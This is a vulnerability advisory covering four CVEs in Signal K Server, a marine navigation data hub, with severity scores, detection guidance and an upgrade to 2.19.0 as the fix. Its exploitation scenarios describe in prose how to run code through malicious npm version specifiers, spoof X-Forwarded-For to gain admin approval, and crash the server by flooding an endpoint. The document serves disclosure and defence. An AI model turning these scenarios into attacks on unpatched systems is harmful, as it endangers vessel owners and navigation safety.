Affected Product
Signal K Server – Marine data server commonly used as a central hub on boats for navigation, sensors, and integrations.
Affected Versions: All versions prior to 2.19.0
Fixed Version: 2.19.0
CVE-2025-68619 – Arbitrary Code Execution via npm Package Installation
Overview
- CVE ID: CVE-2025-68619
- CVSS v3.1 Score: 8.8
- Severity: High
- Attack Vector: Network
- Privileges Required: Admin
- User Interaction: None
- Exploitability: High
- Exploit Availability: Practical and easy for attackers with administrative access
Description
Signal K Server allows administrators to install plugins and web applications using an App Store REST API. Although the server verifies that the supplied package name exists in the npm registry, it does not properly validate or restrict the version parameter.
npm allows highly flexible version syntax, including Git repositories, GitHub shorthand notation, and remote tarballs served over HTTP or HTTPS. Signal K Server passes the version value directly to npm without sanitization.
When npm installs a package, it automatically executes lifecycle scripts such as postinstall. If a malicious package is installed, its post-installation script executes with the privileges of the Signal K Server process, resulting in arbitrary code execution on the host system.
Exploitation Scenario
An attacker with administrative access submits an API request to install a legitimate npm package name but supplies a malicious version specifier that references an attacker-controlled source. npm retrieves and installs the package, executing the malicious postinstall script and allowing full command execution on the system.
Impact
- Full compromise of the Signal K Server
- Installation of backdoors or persistence mechanisms
- Unauthorized access to connected onboard systems
- Potential data exfiltration or system manipulation
MITRE ATT&CK Mapping
- T1190 – Exploit Public-Facing Application
- T1059 – Command and Scripting Interpreter
- T1105 – Ingress Tool Transfer
- T1068 – Exploitation for Privilege Escalation
Detection Guidance
Indicators
- Plugin installations referencing URLs, Git repositories, or non-standard version strings
- Execution of shell commands during plugin installation
- Unexpected outbound network traffic during install operations
Relevant Log Sources
- Signal K application logs
- npm debug and installation logs
- Host-based process execution logs
- Network egress monitoring logs
Detection Rule Concepts
- Alert on npm install commands that include URL-based or Git-based version specifiers
- Monitor for execution of
postinstallscripts during plugin installations - Detect outbound connections initiated during application plugin installation events
Remediation
Upgrade to Signal K Server version 2.19.0.
Official Patch
Signal K Server 2.19.0 introduces strict validation of npm version parameters and blocks non-semantic and external version sources.
CVE-2025-68273 – Unauthenticated Information Disclosure
Overview
- CVE ID: CVE-2025-68273
- CVSS v3.1 Score: 6.5
- Severity: Medium
- Attack Vector: Network
- Authentication Required: None
- Exploitability: High
- Exploit Availability: Easy
Description
Signal K Server exposes internal API endpoints that return sensitive system information without requiring authentication. Any remote user can retrieve detailed internal data related to the server configuration and connected components.
Exposed information includes the complete Signal K data schema, connected serial and navigation devices, and installed analysis or diagnostic tools. This information can be used to map the environment and prepare targeted attacks.
Exploitation Scenario
An attacker sends unauthenticated requests to exposed endpoints and receives detailed internal system information. The attacker uses this data to impersonate devices, craft convincing access requests, or identify attack paths.
Impact
- Exposure of sensitive system configuration details
- Enables reconnaissance for further attacks
- Increased likelihood of successful social engineering or privilege escalation
MITRE ATT&CK Mapping
- T1592 – Gather Victim Host Information
- T1590 – Gather Victim Network Information
Detection Guidance
Indicators
- Anonymous access to internal API endpoints
- Enumeration-style request patterns
Relevant Log Sources
- Web server access logs
- Application request logs
- API gateway or reverse proxy logs
Remediation
Upgrade to Signal K Server version 2.19.0.
Official Patch
Version 2.19.0 enforces authentication on previously exposed endpoints.
CVE-2025-69203 – Social Engineering-Assisted Privilege Escalation
Overview
- CVE ID: CVE-2025-69203
- CVSS v3.1 Score: 8.1
- Severity: High
- Attack Vector: Network
- Authentication Required: No initial authentication
- Exploitability: High
- Exploit Availability: Practical
Description
This vulnerability arises from multiple design weaknesses in the access request system that can be combined to mislead administrators into granting elevated permissions.
The administrator interface prominently displays the request description but makes the requested permission level less visible. Attackers can request administrative access while providing a description that suggests limited or read-only functionality.
Additionally, the system trusts the X-Forwarded-For HTTP header without validation. This allows attackers to spoof trusted internal IP addresses. Combined with the ability to enumerate device names, attackers can convincingly impersonate legitimate onboard devices.
Exploitation Scenario
An attacker enumerates existing device names, submits an access request impersonating a trusted device, requests administrative permissions, provides a benign description, and spoofs an internal IP address. The administrator approves the request based on misleading information, granting full administrative access.
Impact
- Unauthorized administrative access
- Full control of Signal K Server
- Potential compromise of connected systems
MITRE ATT&CK Mapping
- T1078 – Valid Accounts
- T1566 – Phishing / Social Engineering
- T1036 – Masquerading
Detection Guidance
Indicators
- Access requests with descriptions that do not align with requested permissions
- Requests showing internal IP addresses from external sources
- Sudden approval of high-privilege access for new or unknown devices
Relevant Log Sources
- Access request and approval logs
- Authentication and authorization logs
- Reverse proxy and network logs
Remediation
Upgrade to Signal K Server version 2.19.0.
Official Patch
Version 2.19.0 improves permission visibility, validates forwarded IP headers, and hardens access request handling.
CVE-2025-68272 – Unauthenticated Denial of Service
Overview
- CVE ID: CVE-2025-68272
- CVSS v3.1 Score: 7.5
- Severity: High
- Attack Vector: Network
- Authentication Required: None
- Exploitability: Very High
- Exploit Availability: Trivial
Description
The access request endpoint stores incoming requests entirely in memory without rate limiting or size restrictions. An attacker can send a large number of requests and cause unbounded memory consumption.
This leads to JavaScript heap exhaustion and crashes the Signal K Server process.
Exploitation Scenario
An attacker floods the access request endpoint with repeated requests until the server exhausts available memory and crashes.
Impact
- Complete service outage
- Loss of availability for navigation and data services
- Potential safety risks in marine environments
MITRE ATT&CK Mapping
- T1499 – Endpoint Denial of Service
Detection Guidance
Indicators
- High request volume to
/signalk/v1/access/requests - Rapid memory consumption
- Application crashes or restarts
Relevant Log Sources
- Web server logs
- Application crash and error logs
- System memory and performance metrics
Remediation
Upgrade to Signal K Server version 2.19.0.
Official Patch
Version 2.19.0 adds request limits and improves memory management.
Final Recommendation
All listed vulnerabilities are fully addressed in Signal K Server version 2.19.0. Immediate upgrade is strongly recommended, especially for systems exposed to external networks or used in safety-critical marine environments.
